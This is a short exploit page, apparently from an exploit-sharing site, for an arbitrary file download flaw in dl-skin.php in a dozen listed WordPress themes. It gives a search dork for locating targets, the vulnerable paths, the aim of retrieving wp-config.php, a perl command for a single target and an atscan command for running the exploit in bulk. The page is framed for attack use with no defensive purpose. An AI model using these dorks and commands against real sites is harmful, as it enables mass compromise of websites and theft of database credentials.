Wordpress AFD dl-skin.php Exploit
| Screenshots: |


|
| DORK: |
| index of /lib/scripts/dl-skin.php |
| Vulnerable themes: |
|
wp-content/themes/infocus/lib/scripts/
wp-content/themes/elegance/lib/scripts/
wp-content/themes/awake/lib/scripts
wp-content/themes/fusion/lib/scripts/
wp-content/themes/Minamaze_Pro/lib/scripts/
wp-content/themes/construct/lib/scripts/
wp-content/themes/persuasion/lib/scripts/
wp-content/themes/dejavu/lib/scripts/
wp-content/themes/versatile/lib/scripts/
wp-content/themes/Melos_Pro/lib/scripts/
wp-content/themes/barracudafx/lib/scripts/
wp-content/themes/mesocolumn/lib/scripts/
|
| EXPLOITATION: |
| Get wp-config.php file |
| USAGE: |
| perl WP-dl-skin-exploit.pl http://site.com/wp-content/themes/THEME NAME/lib/scripts/dl-skin.php |
| ATSCAN MASS USAGE: |
| atscan -d 'index of /lib/scripts/dl-skin.php' -m 2 -l 10 --command "perl WP-dl-skin-exploit.pl --TARGET" |